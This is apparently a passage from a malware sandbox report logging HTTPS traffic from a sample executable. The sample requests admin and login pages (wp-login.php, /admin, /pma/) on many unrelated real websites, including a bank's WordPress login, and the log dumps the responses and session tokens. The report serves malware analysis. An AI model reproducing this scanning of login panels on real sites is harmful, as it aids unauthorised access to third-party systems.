                                                                                                                                                                                                    2023-11-26 06:00:04 UTC2755INData Raw: 63 61 6c 65 44 61 74 61 28 20 6c 6f 63 61 6c 65 44 61 74 61 2c 20 64 6f 6d 61 69 6e 20 29 3b 0a 7d 20 29 28 20 22 64 65 66 61 75 6c 74 22 2c 20 7b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 2d 72 65 76 69 73 69 6f 6e 2d 64 61 74 65 22 3a 22 32 30 32 33 2d 31 31 2d 31 30 20 31 37 3a 31 38 3a 34 37 2b 30 30 30 30 22 2c 22 67 65 6e 65 72 61 74 6f 72 22 3a 22 47 6c 6f 74 50 72 65 73 73 5c 2f 34 2e 30 2e 30 2d 61 6c 70 68 61 2e 31 31 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 6c 6f 63 61 6c 65 5f 64 61 74 61 22 3a 7b 22 6d 65 73 73 61 67 65 73 22 3a 7b 22 22 3a 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 65 73 73 61 67 65 73 22 2c 22 70 6c 75 72 61 6c 2d 66 6f 72 6d 73 22 3a 22 6e 70 6c 75 72 61 6c 73 3d 32 3b 20 70 6c 75 72 61 6c 3d 6e 20 21 3d 20
                                                                                                                                                                                                    Data Ascii: caleData( localeData, domain );} )( "default", {"translation-revision-date":"2023-11-10 17:18:47+0000","generator":"GlotPress\/4.0.0-alpha.11","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=2; plural=n !=
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    604192.168.2.45714418.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC190OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:04 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    605192.168.2.45717618.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC177OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:04 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 06:00:04 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    606192.168.2.4571613.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 42 4e 55 56 77 52 30 31 6f 65 46 70 50 65 54 46 70 5a 7a 68 35 64 6b 39 42 62 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6b 74 58 57 47 64 30 64 56 5a 6f 64 6b 4e 6e 64 33 4e 69 61 57 46 47 64 33 4e 44 4f 57 68 6c 53 6e 4e 54 55 45 56 31 5a 6b 74 76 56 33 5a 61 59 57 6c 4a 63 48 6c 57 5a 55 74 35 4c 33 63 33 4e 6d 4a 59 59 32 39 68
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:04 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IlJBNUVwR01oeFpPeTFpZzh5dk9Bb3c9PSIsInZhbHVlIjoiaktXWGd0dVZodkNnd3NiaWFGd3NDOWhlSnNTUEV1ZktvV3ZaYWlJcHlWZUt5L3c3NmJYY29h
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC5813INData Raw: 31 36 61 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 66 69 78 65 64 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62
                                                                                                                                                                                                    Data Ascii: 16a8<!doctype html><html class="fixed"><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalab


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    607192.168.2.457253213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:04 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    608192.168.2.457282185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC173OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC302INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:04 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    609192.168.2.457155164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:04 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC4130INData Raw: 31 30 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 101a<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC2144INData Raw: 38 35 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 30 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 2e 32 22 20 69 64
                                                                                                                                                                                                    Data Ascii: 859<script type="text/javascript" src="https://gccb.co.in/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script><script type="text/javascript" src="https://gccb.co.in/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2" id
                                                                                                                                                                                                    2023-11-26 06:00:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    610192.168.2.45731054.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC267OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: originDirect=true; SESSION=c96b998b-a74b-45b6-ad7c-cfc7be5f76e0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Strict-Transport-Security: max-age=315360
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC15988INData Raw: 37 65 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 7e69<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 06:00:05 UTC16381INData Raw: 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 68 72 65 66 3d 22 2f 63 61 74 65 67 6f 72 69 61 2f 6d 61 71 75 69 6e 61 73 2d 65 71 75 69 70 61 6d 65 6e 74 6f 73 2f 63 61 6d 62 69 6f 2d 74 72 61 6e 73 6d 69 73 73 61 6f 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 63 61 6d 62 69 6f 2d 74 72 61 6e 73 6d 69 73 73 61 6f 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09
                                                                                                                                                                                                    Data Ascii: class="sub-menu-item-link" itemprop="url" href="/categoria/maquinas-equipamentos/cambio-transmissao" onclick="sendKinesisDataAjax({actionID: 'click',actionData:`cambio-transmissao - category2`})">
